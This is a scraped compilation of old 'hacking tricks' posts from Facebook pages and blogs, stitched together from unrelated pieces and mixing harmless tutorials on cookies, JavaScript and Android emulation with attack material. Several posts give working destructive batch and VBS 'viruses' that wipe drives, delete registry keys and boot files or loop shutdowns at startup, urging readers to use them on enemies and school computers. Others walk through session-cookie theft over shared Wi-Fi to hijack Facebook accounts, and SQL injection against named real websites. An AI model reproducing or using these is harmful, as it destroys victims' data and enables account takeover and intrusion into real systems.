How To bypass sms verification on website... By Ravindra Solanki The SMS verification mechanism on various websites can be overridden. SMS verification is a method used by many websites, including Facebook, Google and Twitter, to verify the authenticity of users and to keep spammers out. In this, the website sends a unique code to your mobile number, which has to be entered on the website in order to verify yourself. The service provides extra security for the website and helps them in marketing purposes as well. In order to bypass the SMS verification mechanism, the user first has to go to www.receive-sms-online.com. From here, users can choose a number that they will receive SMSs on. Once this is done, enter this number on whichever website is asking you for phone details, you will receive the SMS on this number. Now, on the other website click on the phone number that you chose and you will be redirected to the message inbox. You will find the code that you need to verify yourself here. Just to warn you, don’t use these shared number to verify bank accounts or online wallets. Since many people are using them, your details can very easily be compromised. Other private accounts should also not be verified using this. The SMS verification mechanism is a good way for websites to gain marketing angles. When the user enters their number, many websites start sending promotional messages to their mobiles regularly. You can use the shared numbers on such websites in order to avoid overloading your own inbox.

What is Role Of Cookie,types, uses, setting and Privacy Concerns About Cookies

What is Role Of Cookie,types, uses, setting and Privacy Concerns About Cookiesby Learn Koding  30/10/2014 | 8:47 0 Posted in Articles  What is Role Of Cookie,types, uses, setting and Privacy Concerns About Cookies A Cookie is used to maintain information about a user state. Cookies can be used to store user preferences and user information that can be used across pages in the website. A cookie is also knows as Web Cookie, Browser Cookie and HTTP Cookie.   A Cookie is stored as Text Strings on the computer. A Web Server sends a cookie and then browser stores it. The browser returns the cookie to the server when the page is referenced again. The most common use of a cookie is to store a user ID. A cookie may contain the string such as ID=96352398. Example The website www.amazon.com uses cookies. The user fills a form with name and address to order a book. Amazon assigns an ID, stores user’s information with the ID in its database to the server. It also sends the ID to user’s browser as a cookie. The browser stores ID on the hard disk. The browser sends then ID back to the server when the user visits Amazon again. The server customizes the web page according to the user ID. Types Of Cookies Cookies can be temporarily and persistent. Temporary Cookie: Temporary cookie is also called Session Cookie. It is stored temporarily in browser’s memory and it deleted when the session ends or the browser is closed. Permanent Cookie: Permanent cookie is also called Persistent Cookie. It is stored permanently on computer’s hard drive. If it is deleted, it will be recreated when the user visits the website again. Uses Of Cookies: Cookies are used for different purposes such as follows: Most websites use them for personalization of user preferences. For example, a news website may allow the user to customize the page to display the news of his interests. The website stores user preference in cookies. Some websites also use cookies to store user’s passwords. The users do not need to enter the password again and again. Some website use cookies to track visits of users and web pages visited by the users. Online shopping sites generally use session cookies to keep the track of items in a user’s shopping cart. Some website may use cookies to target advertisement. These sites store a user’s interests and browsing habits in the cookie and display related ads on the pages. Browser Setting For Cookies The browser can be set to accept cookies as follows: The user can set the browser to accept cookies automatically. It can be used to prompt the user to accept a cookie. It can be set to disable the use of cookies altogether. However, the user may not be able to use many of e-commerce web sites if cookies are disabled. Privacy Concerns About Cookies             Webmasters obtain information about user’s IP addresses, Browser type, last pages visited using cookies. It allows web server to recognize a user who has already visited the website from the same computer. It allows the compilation of user profiles and large amounts of data related to the interested of the user.             Advertisers and webmasters are currently using cookies to develop detailed profiles of users and their browsing habits. Each click on a particular type of page in a website is added to the profile. The information is primarily used for website design and placement of banner advertisements. However, this information be sold for other commercial purpose that creates a concern to personal privacy.

(99) Make Some Useful & Dangerous Viruses In... - Cybercells tricks

Make Some Useful & Dangerous Viruses In Notepad..... Create Your Own Viruses Today we will learn how to create simple but dangerous viruses using notepad. These are very simple to create and use, but don’t dare to use these on your computer because these viruses can destroy your personal information. Where to use? You can send these viruses to your enemies or if you wanna try it yourself best and my favorite place is school computers . Let’s get started. How to make a virus ? Open Notepad Put The Codes Provided Save it in the correct extension Done Wiper [Not Official Name But I call It] Deletes everything in the computer’s drive @echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q Save As “Your File Name.bat [Batch File] Registry Deleter Deletes everything stored in registry @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* No Access A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD @Echo off Ipconfig /release Shut Up Send your friend a little message and shut down his computer @echo off msg * Lets Roll Baby shutdown -c “Error! Your ass got glued!” -s Crash Puter This is simple virus that crashes the computer – [Save As Anything.VBS] Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject (“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next Ez Formatter This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives. rd/s/q D:\ rd/s/q C:\ rd/s/q E:\ Shutter This virus can be very annoying it shutdowns computer every time the computer is turned on. echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add hkey_local_machinesoftwaremicr osoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicro softwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f echo You Are Nailed, Buy A New Computer This Is Piece Of Shit. PAUSE Now its time for few very dangerous viruses Rest In Peace It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows. Do not use on yourself . @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini Century Shut downs the PC hundred times. To stop Start Run and type shutdown -a . You can also change the times pc restarts by replacing 100 by your choice. Create a new shortcut and type :- shutdown -s -t 100 c “Installing Updates” RIP -2 This virus does the same It also prevents pc from starting but in an effective and better way. del c:\WINDOWS\system32\*.*/q Freak This virus disables the internet forever echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicr osoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicro softwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You have maxed your internet usage for a lifetime PAUSE

(120) Facebook

Top 10 Android Apps That Turn Your Phone into a Hacking Device http://goo.gl/eajIiP Did you know, you can turn your everyday Android powered smartphone into a powerful hacking device to reckon with? More @ The Infecter ‪#‎Android‬ ‪#‎Hacking‬ ‪#‎wifi‬ ‪#‎lolipopandroid‬ ‪#‎kitkatandroid‬ ‪#‎APK‬ ‪#‎free‬ ‪#‎hackingtool‬ ‪#‎Hackingapps‬ ‪#‎smartphone‬ ‪#‎Linux‬ ‪#‎windows‬ ‪#‎google‬ ‪#‎facebook‬ ‪#‎cyberloveX‬ ‪#‎hackthecode‬ ‪#‎love‬ ‪#‎hate‬ ‪#‎twitter‬
Wednesday, October 29, 2014

(5) Five steps to make stay hidden on the internet... - Cybercells tricks

Five steps to make stay hidden on the internet Step 1 Change your IP More then once a day i would suggest u change it 3-4 times Every day Step 2 Have terminal open and type in netstat Every 5minutes to see what data is coming in and out Step 3 Delete all your cookies !! And in settings of your browser dont store anything dont save your browser history . IF a person would attack your browser u will have nothing saved in it . Step 4 Dont login to any social media using your "anonymous ip" IF they trace it they are gonna se that your connected to facebook. And IF they scan u , u can simply see that using step 2;) Step 5 To avoid spammed etc when ur signign up to a website use a fake email addres that forwards the emails to yourmain email and after a couple of hours the email is gone . i would recomend using melt-mail Note that some website dont like when u use melt- mail like facebook thats why we cant link it in a regular way

Website Attack Methods Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc. Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data. Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users. Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization. Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks. Information Leakage and Improper Error Handling Applications can unintentionallyleak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks. Broken Authentication and Session Management Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities. A8 - Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud. Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications. Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly. Kizhan Razak Via TOP WORLD hackers

Website Attack Methods Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc. Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data. Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users. Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization. Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks. Information Leakage and Improper Error Handling Applications can unintentionallyleak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks. Broken Authentication and Session Management Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities. A8 - Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud. Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications. Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly. Kizhan Razak Via TOP WORLD hackers

(5) TOP WORLD hackers

>>Make a WinRAR password cracker<< --------------------------------------------------- This is a simple password cracker for WinRAR archives which can crack numeric passwords. The method works only on .rar files. You should have WinRAR installed to make this password cracker. Follow the easy steps below and see how easy it is! You don't need anything else, but notepad for this password cracker! Watch the video tutorial: http://youtu.be/BDFYCYnOPzw Via TOP WORLD hackers

(33) >>>> TOP WORLD Hackers <<<< You can actually... - TOP WORLD Hackers

>>>> TOP WORLD Hackers <<<< You can actually create an Android device, phone or tablet, on your existing computer and taste the complete Android experience as real as it on a real Android device. For this, you will need either VMware Player Plus or Oracle VM VirtualBox virtualization platforms (both are free for personal/nonprofit use) and the AndroVM OVA (free as well), which is actually a virtual appliance (OVA) to use with virtualization platforms. to create the virtual Android device. Download and install either of the virtualization platforms and also save the AndroVM OVA on your PC. Here I am telling you about VMware Player Plus, but the Oracle VM VirtualBox process is the same. If you have succesully installed VMware Player Plus, you will see the AndroVM OVA file has it’s own icon. Right click on the AndroVM OVA file and select ‘Open with VMware Player’. This will come up with a Virtual Appliance Import wizard. Finish importing the OVA to your installed virtualization platform, you don’t need to configure anything or follow any special instruction here, just complete the import wizard. Finally, after the import completes, you will see your Android device created and ready to run, just like any other Android device. Get AndroVM here :- http://androvm.org/blog/download/ Kizhan Razak Via TOP WORLD hackers

(31) >>>> TOP WORLD Hackers <<<< You can actually... - TOP WORLD Hackers

>>>> TOP WORLD Hackers <<<< You can actually create an Android device, phone or tablet, on your existing computer and taste the complete Android experience as real as it on a real Android device. For this, you will need either VMware Player Plus or Oracle VM VirtualBox virtualization platforms (both are free for personal/nonprofit use) and the AndroVM OVA (free as well), which is actually a virtual appliance (OVA) to use with virtualization platforms. to create the virtual Android device. Download and install either of the virtualization platforms and also save the AndroVM OVA on your PC. Here I am telling you about VMware Player Plus, but the Oracle VM VirtualBox process is the same. If you have succesully installed VMware Player Plus, you will see the AndroVM OVA file has it’s own icon. Right click on the AndroVM OVA file and select ‘Open with VMware Player’. This will come up with a Virtual Appliance Import wizard. Finish importing the OVA to your installed virtualization platform, you don’t need to configure anything or follow any special instruction here, just complete the import wizard. Finally, after the import completes, you will see your Android device created and ready to run, just like any other Android device. Get AndroVM here :- http://androvm.org/blog/download/ Kizhan Razak Via TOP WORLD hackers

(5) TOP WORLD hackers

#‎Admin‬ >>Cookie Stealing Attack:<< Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc. This is my favorite method. this is work only At LAN(local Area Network) . its best place to hack at university, cafe , public place where computer are on one LAN simple Example:-WI-Fi. What is Cookies And how the use of stealing cookies? Cookies are file’s that stored on Any computer’s By any website when a you visits them . the cookie used by the web server to check the authenticate the Real user .like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file . both are matched when you open a Account. so then finally we will start. Step 1: Download the Wire Shark and install it. Step 2: Next open the wire shark and then click on interface. Step 3: Next choose a interface which is received and sending packet and click on start Step 4: Continue the sniffing for around like 10 minutes. Step 5: After a maximum 10 minute stop the sniffing by going to a capture menu. Step6: its important step, now filter to http.cookie contains “datr”. Then filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie. Step 7: Now click on it and then goto the copy > Bytes > Printable Text only Step 8: Now for next step you must have 3 thing, 1. Mozilla Firefox [browser] 2. Grease Monkey[add-on] 3. Cookie injector[code] and then open facebook.commake sure you are not login Step 9: Press the button Alt C to bring up a cookie injector and then Simply paste in a cookie value into it. Step 10 Now refresh your page so then finally you Enter the Victim Account. Kizhan Razak Via TOP WORLD hackers /* Only for Educational Purpose */

Disadvantages of JavaScript - YouTube

Published on Oct 29, 2014 Link for all dot net and sql server video tutorial playlists http://www.youtube.com/user/kudvenkat... Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspo... In this video we will discuss the disadvantages or downsides of using JavaScript. There are two main disadvantages of JavaScript. Security : JavaScript runs on the client machine. So a malicious user may use Javascript to do a variety of things like tracking your browsing history, stealing passwords etc. This is one of the main reasons why people disable JavaScript. Browser Compatibility : Not all browsers treat the same piece of JavaScript in the same manner. This means the functionality and the user interface may vary from browser to browser. That is why cross-browser testing is very important. However, with JavaScript libraries like jQuery Browser Compatibility is no longer a major issue. JavaScript Browser Compatibility Examples Example 1 : innerText property is supported in IE & Chrome, but not in Firefox. This means the ValidatForm() JavaScript function that we worked with in Part 1, will only work in IE & Chrome but not in Firefox. function ValidatForm() { var ret = true; if (document.getElementById("txtFirstN­ame").value == "") { document.getElementById("lblFirstNa­me").innerText = "First Name is required"; ret = false; } else { document.getElementById("lblFirstNa­me").innerText = ""; } if (document.getElementById("txtLastNa­me").value == "") { document.getElementById("lblLastNam­e").innerText = "Last Name is required"; ret = false; } else { document.getElementById("lblLastNam­e").innerText = ""; } if (document.getElementById("txtEmail&­quot;).value == "") { document.getElementById("lblEmail&q­uot;).innerText = "Email is required"; ret = false; } else { document.getElementById("lblEmail&q­uot;).innerText = ""; } return ret; } For the above JavaScript function to work in all the browsers that is in IE, Chrome & Firefox, replace innerText property with textContent as shown below. function ValidatForm() { var ret = true; if (document.getElementById("txtFirstN­ame").value == "") { document.getElementById("lblFirstNa­me").textContent = "First Name is required"; ret = false; } else { document.getElementById("lblFirstNa­me").textContent = ""; } if (document.getElementById("txtLastNa­me").value == "") { document.getElementById("lblLastNam­e").textContent = "Last Name is required"; ret = false; } else { document.getElementById("lblLastNam­e").textContent = ""; } if (document.getElementById("txtEmail&­quot;).value == "") { document.getElementById("lblEmail&q­uot;).textContent = "Email is required"; ret = false; } else { document.getElementById("lblEmail&q­uot;).textContent = ""; } return ret; } Example 2 : The following JavaScript function ddlGenderSelectionChanged() works in Chrome and Firefox but not in Internet Explorer. [%@ Page Language="C#" AutoEventWireup="true" CodeBehind="WebForm1.aspx.cs" Inherits="Demo.WebForm1" %] [!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml...] [html xmlns="http://www.w3.org/1999/xhtml"] [head runat="server"] [title][/title] [script type="text/javascript" language="javascript"] function ddlGenderSelectionChanged() { alert('You selected ' + ddlGender.value); } [/script] [/head] [body] [form id="form1" runat="server"] [div] [select id="ddlGender" onchange="ddlGenderSelectionChanged­()"] [option]Male[/option] [option]Female[/option] [/select] [/div] [/form] [/body] [/html] For the JavaScript function to work in all browsers (Chrome, Firefox & Internet Explorer) it needs to be modified as shown below. [script type="text/javascript" language="javascript"] function ddlGenderSelectionChanged() { alert('You selected ' + document.getElementById('ddlGender&#­39;).value); } [/script]

███████▓█████▓▓╬╬╬╬╬╬╬╬▓███▓╬╬╬╬╬╬╬▓╬╬▓█ ████▓▓▓▓╬╬▓█████╬╬╬╬╬╬███▓╬╬╬╬╬╬╬╬╬╬╬╬╬█ ███▓▓▓▓╬╬╬╬╬╬▓██╬╬╬╬╬╬▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ████▓▓▓╬╬╬╬╬╬╬▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ███▓█▓███████▓▓███▓╬╬╬╬╬╬▓███████▓╬╬╬╬▓█ ████████████████▓█▓╬╬╬╬╬▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬█ ███▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ████▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ███▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ █████▓▓▓▓▓▓▓▓█▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ █████▓▓▓▓▓▓▓██▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ █████▓▓▓▓▓████▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ████▓█▓▓▓▓██▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ████▓▓███▓▓▓▓▓▓▓██▓╬╬╬╬╬╬╬╬╬╬╬╬█▓╬▓╬╬▓██ █████▓███▓▓▓▓▓▓▓▓████▓▓╬╬╬╬╬╬╬█▓╬╬╬╬╬▓██ █████▓▓█▓███▓▓▓████╬▓█▓▓╬╬╬▓▓█▓╬╬╬╬╬╬███ ██████▓██▓███████▓╬╬╬▓▓╬▓▓██▓╬╬╬╬╬╬╬▓███ ███████▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬████ ███████▓▓██▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓████ ████████▓▓▓█████▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█████ █████████▓▓▓█▓▓▓▓▓███▓╬╬╬╬╬╬╬╬╬╬╬▓██████ ██████████▓▓▓█▓▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬▓███████ ███████████▓▓█▓▓▓▓███▓╬╬╬╬╬╬╬╬╬▓████████ ██████████████▓▓▓███▓▓╬╬╬╬╬╬╬╬██████████ ███████████████▓▓▓██▓▓╬╬╬╬╬╬▓███████████

███████▓█████▓▓╬╬╬╬╬╬╬╬▓███▓╬╬╬╬╬╬╬▓╬╬▓█ ████▓▓▓▓╬╬▓█████╬╬╬╬╬╬███▓╬╬╬╬╬╬╬╬╬╬╬╬╬█ ███▓▓▓▓╬╬╬╬╬╬▓██╬╬╬╬╬╬▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ████▓▓▓╬╬╬╬╬╬╬▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ███▓█▓███████▓▓███▓╬╬╬╬╬╬▓███████▓╬╬╬╬▓█ ████████████████▓█▓╬╬╬╬╬▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬█ ███▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ████▓▓▓▓▓▓▓▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ ███▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ █████▓▓▓▓▓▓▓▓█▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█ █████▓▓▓▓▓▓▓██▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ █████▓▓▓▓▓████▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ████▓█▓▓▓▓██▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██ ████▓▓███▓▓▓▓▓▓▓██▓╬╬╬╬╬╬╬╬╬╬╬╬█▓╬▓╬╬▓██ █████▓███▓▓▓▓▓▓▓▓████▓▓╬╬╬╬╬╬╬█▓╬╬╬╬╬▓██ █████▓▓█▓███▓▓▓████╬▓█▓▓╬╬╬▓▓█▓╬╬╬╬╬╬███ ██████▓██▓███████▓╬╬╬▓▓╬▓▓██▓╬╬╬╬╬╬╬▓███ ███████▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬████ ███████▓▓██▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓████ ████████▓▓▓█████▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█████ █████████▓▓▓█▓▓▓▓▓███▓╬╬╬╬╬╬╬╬╬╬╬▓██████ ██████████▓▓▓█▓▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬▓███████ ███████████▓▓█▓▓▓▓███▓╬╬╬╬╬╬╬╬╬▓████████ ██████████████▓▓▓███▓▓╬╬╬╬╬╬╬╬██████████ ███████████████▓▓▓██▓▓╬╬╬╬╬╬▓███████████

(164) Facebook

How to make single name ID on facebook Hi guys, Today i am going to tell you, how to make single name ID on facebook.. Simply just follow these steps. This trick will work only in mozila firefox. First change your browser proxy manually. Use anyone one proxy from this given list. HTTP Proxy :- 119.252.160.34 202.43.188.143 118.98.35.251 36.76.182.173 61.247.45.35 180.250.169.14 180.250.82.188 119.252.160.34 219.83.100.195 110.139.125.230 202.87.254.156 PORT:- 8080 Step 1:Open mozila firefox and then Goto Settings of Mozila Firefox and then choose Network. Step 2: Fill the proxy from the above list as shown below and then Save Your Settings. Step 3: Now Open your Facebook Account. Change your language "English" (us) to "Bahasa, Indonesia". Step 4: Goto Account Settings in Facebook Then Simply remove Your Last Name And Save it... Now Your Facebook Account is only with First Name Without Last Name.. Step 5: After Completing all steps remove "Manual Proxy" and select "use system proxy" settings and change your language back to "English (us)". Note: Firstly Open your Facebook account settings then change proxy because sometime after changing proxy their will be error in log in account, Please Don't Forget To Remove Proxies After Using. If you have any problem in making the single name ID then tell me in your comments.

(100) fb trìçkß grœup bÿ Âbhîñàv

#‎Admin_post‬ How Do Block User Can Chat onFacebook TrickThis Trick Is 100% Working In Facebook,,.Follow Below Steps CarefullyStep-1:First of all go to profile of your friend to whom you want to chat. e.g.Www.faceboo k.com/ shadaab.hussain. 39Step-2:Now just copy username of your friend and convert it into Facebook email id | For example:-Shadaab.hussain.39@fa cebook.comStep-3:Now open your email account which is associated with your Facebook account.Step-4:Now compose new email and fill email id which we made usingStep-2:andtype your message and send it.You message will be delivered to your friend’s Facebook inbox and when he/she replies you then youwill get message on your email account

(3) Heyy guyzz.. Now Im telling u tht How to Bypass... - ALL Tips And Tricks by ADNAN

Heyy guyzz.. Now Im telling u tht How to Bypass Facebook photo tag verification.. Sometimes when u change ur browser or login into facebook from uc browser or mozilla firefox then your account temporarily locked bcoz of untrusted browser cookies or IP address. Then it will ask u identify the photo tags to unlock ur account.. To open ur account u have to do following steps.. * First, you must open the Google Image Search Engine. * Now Copy First name and search on Google image search. Like this Facebook+"name of 1st friend" * Than You will see That picture on Image Search. * You will see in 1 to 3 Image result. * If you can see than search again second friends name, Just Match and submit it to Facebook, That's all, you're all done now.. Note:- To avoiding dis problem always prefer opera mini browser in mobile instead of uc browser or any other.. ‪#‎ADMIN‬ Adnan

IT INFO: Cookie Stealing Attack:Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo

Cookie Stealing Attack:Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc. Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc. this works At LAN(local Area Network) . its best place to hack at university, cafe , public place where computer are on one LAN simple Example WI-Fi. What is Cookies And how the use of stealing cookies? Cookies are file’s that stored on Any computer’s By any website when a you visits them . the cookie used by the web server to check the authenticate the Real user . like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file . both are matched when you open a Account. so then finally we will start. Step 1: Download the Wire Shark and install it. Step 2: Next open the wire shark and then click on interface. Step 3: Next choose a interface which is received and sending packet and click on start Step 4: Continue the sniffing for around like 10 minutes. Step 5: After a maximum 10 minute stop the sniffing by going to a capture menu. Step6: its important step, now filter to http. cookie contains “datr”. Then filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie. Step 7: Now click on it and then goto the copy > Bytes > Printable Text only Step 8: Now for next step you must have 3 thing, 1. Mozilla Firefox [browser] 2. Grease Monkey[add-on] 3. Cookie injector[code] and then open facebook. com make sure you are not login Step 9: Press the button Alt C to bring up a cookie injector and then Simply paste in a cookie value into it. Step 10 Now refresh your page so then finally you Enter the Victim Account.

(12) TRICK2. BREAKING DOWN PARTS BY PARTS Open... - Computer & Hacking Tricks

TRICK2. BREAKING DOWN PARTS BY PARTS Open Notepad and paste this: @echo off echo WARNING VIRUS IS AT SIGHT echo System check echo - echo RAM – FAILED echo - echo Breach of IP adress echo - echo Firewall – FAILED echo - echo Hard drive must be erased and rebooted to resume windows. echo - PAUSE echo - echo Starting to reboot hardrive. echo - echo Do not attempt to exit. echo - PAUSE :START start dProcess.bat GOTO START Save it as dProcess.BAT Hope You Find This One Cool As Well.

(41) FACT - Timeline Photos

FACT CREATE FACEBOOK PAGE WITHOUT A NAME APRIL/2014 How To Create Facebook Page Without Name . NOTE: PAGE SHOULD # NOT HAVE# MORE THAN 200 LIKE. Follow These Two Steps To Make A Facebook Page Without Name: 1- Mark, Copy and Name Your Page To :اًًًًًًٌٌٌٌٌٌَُُُّّّّْْْ 2- Mark, Copy and ReName Your Page To:ANUJاًًًًًًٌٌٌٌٌٌَُُُّّّّْْْ #NOTE : YOU CANT ABLE TO DO WITHOUT SEENING THE VIDEO YOU MUST WATCH VIDEO : https://www.youtube.com/watch?v=k53mUgMK5q0 #CONTACT FOR QUERIES: #ARTICLE BY : www.facebook.com/FACTAJ #ADMIN: www.facebook.com/AJSTAR0 —

How To Create Facebook Page Without Name : BY ANUJ : https://www.facebook.com/AJSTAR0 - YouTube

Published on Mar 31, 2014 CONNECT FOR LATEST TRICKS : https://www.facebook.com/AJSTAR0 POST ON FB FACT PAGE : https://www.facebook.com/photo.php?fb... PUBLISHED BY :https://www.facebook.com/AJSTAR0 ARTICLE PUBLISHED ON : https://www.facebook.com/FACTAJ SAMPLE EMPTY PAGE : https://www.facebook.com/hacktricksan... ASK QUESTION ON MESSAGE : https://www.facebook.com/AJSTAR0 Category Education

(¯`·._.·ha3ker-site·._.·´¯)

Hello Friends! Welcome on elite cyber security.2day i am going to show you how to make a sql injection.. 1. find vulner able website: use Google.com and use sql dorks : pick a target: I.e: http://www.futuresfins.com/fin-detail.php?id=173 2. check its sql vulnerable or not jus Add ' in the end and hit enter. I.E: http://www.futuresfins.com/fin-detail.php?id=173' syntax error....Good its vulnerable....Now lets start: 3.Get Number of colums: Add order by 1,2,5 .8-- .etc I.e: http://www.futuresfins.com/fin-detail.php?id=173 order by 5-- (no error)page opend. http://www.futuresfins.com/fin-detail.php?id=173 order by 12-- (error) http://www.futuresfins.com/fin-detail.php?id=173 order by 11-- (no error) it means there are 11 colums in this website... 4.union of all columns.. it will show you vulnerable columns that you can use... http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,2,3,4,5,6,7,8,9,10,11-- other: http://www.cti-pfan.net/privacy.php?id=-9 union select all 1,2,3,4,5,6,7,8-- Note: always Add - befor id number i.e:php?id=-173 as you can see here is 2 show on secreen...it mean 2 colum is vulnerable... 5.check version : replace 2 with: @@version I.e: 